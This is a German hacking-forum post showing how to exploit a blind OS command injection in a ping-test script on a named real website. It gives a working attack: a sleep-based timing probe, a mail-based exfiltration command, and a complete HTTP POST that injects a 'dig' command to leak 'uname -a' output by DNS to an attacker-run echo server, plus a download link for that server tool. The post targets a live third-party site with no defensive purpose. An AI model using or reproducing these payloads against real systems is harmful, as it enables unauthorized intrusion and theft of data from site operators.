Zum Inhalt wechseln

Als Gast hast du nur eingeschränkten Zugriff!


Anmelden 

Benutzerkonto erstellen

Du bist nicht angemeldet und hast somit nur einen sehr eingeschränkten Zugriff auf die Features unserer Community.
Um vollen Zugriff zu erlangen musst du dir einen Account erstellen. Der Vorgang sollte nicht länger als 1 Minute dauern.

  • Antworte auf Themen oder erstelle deine eigenen.
  • Schalte dir alle Downloads mit Highspeed & ohne Wartezeit frei.
  • Erhalte Zugriff auf alle Bereiche und entdecke interessante Inhalte.
  • Tausche dich mich anderen Usern in der Shoutbox oder via PN aus.
 

   

Foto

onexpro.de - Blind OS Command Injection

- - - - -

  • Bitte melde dich an um zu Antworten
Keine Antworten in diesem Thema

#1
Zero-X

Zero-X

    FTB Experte

  • Premium Member
  • Likes
    127
  • 98 Beiträge
  • 45 Bedankt
  • Android
  • Windows, Linux
URL:
www.onexpro.de/webmastertools/pingtest-2.php

Das Skript pingtest-2.php ist anfällig gegen eine Blind OS Command Injection. Das heist, wir können Shell-Befehle an das Skript übergeben ohne die Ausgabe sehen zu können. Wenn wir jetzt an den Parameter "count" den Wert ";sleep 10;" übergeben, stellen wir eine deutliche Zeitverzögerung fest. Das heist, wir haben etwas gefunden.
Normalerweise kann man jetzt beispielweise mit ";uname -a|mail email@provider.de;" eine E-Mail mit der Ausgabe des Shell-Befehls an eine gewünschte E-Mail Adresse senden. In diesem Fall geht das aber nicht, weil der Mail-Befehl nicht verfügbar ist.
Wir können uns aber mit dem Befehl "dig" Befehle übermitteln, indem wir einen manipulierten Domainaufruf ausführen.

Zuerst brauchen wir einen Echo-Server, der alles mitschneidet.

Ich nehme jetzt mal den hier:

Please Login HERE or Register HERE to see this link!



SHA256: e1af7723d0672d7169cd259829b743efb0b9ae297276687a063e6853aee55733
Dateiname: echotool.exe
Erkennungsrate: 0 / 56
Analyse-Datum: 2014-12-12 19:16:06 UTC ( vor 0 Minuten )

Jetzt starten wir den Server in der Kommandozeile mit folgendem Befehl:
echotool /p udp /s 53 /r 53 /l 53
Der Server lauscht jetzt auf Port 53.


Danach senden wir folgende Daten mit Live HTTP Headers:

POST: www.onexpro.de/webmastertools/pingtest-2.php

HTTP Header:
Host: www.onexpro.de
User-Agent: XXX
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://www.onexpro.de/webmastertools/pingtest-2.php
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 48

POST Inhalt:
p2=google.com&url=&count=3;dig @deine_ip $(uname -a);&submit=View%21&send=1

Bei "deine_ip" soll der Computer angegeben sein, auf dem wir das echotool laufen haben.
Beim Post-Inhalt senden wir mit ";dig @deine_ip $(uname -a);" eine DNS-Abfrage für die Domain "$(uname -a)" an den Server "deine_ip".

Hat alles geklappt, sehen wir im Kommandozeilenfenster des Echotools die Ausgabe des Shell-Befehls "uname -a".



  Thema Forum Themenstarter Statistik Letzter Beitrag

Besucher die dieses Thema lesen:

Mitglieder: , Gäste: , unsichtbare Mitglieder:


This topic has been visited by 36 user(s)


    , 0*ptr, abramas, Alpha63, Aurus, bbxhnr, BlackZetsu, Bypass, Cranky, Cube, CyberFlash, Dr. Spic, FalkE, Framerater, InternetFreak, Julius K9, Juri, kpakpando, lolorollo, Lyrix, mdwd, Norky, pdr0, Phesii, pornoralle, R3s1stanc3, SavE1, sniffer, Teeworst, VeqasZ, weedneger, Woodenhero, Xenio, xrahitel, Zero-X, ZeroFreez
Die besten Hacking Tools zum downloaden : Released, Leaked, Cracked. Größte deutschsprachige Hacker Sammlung.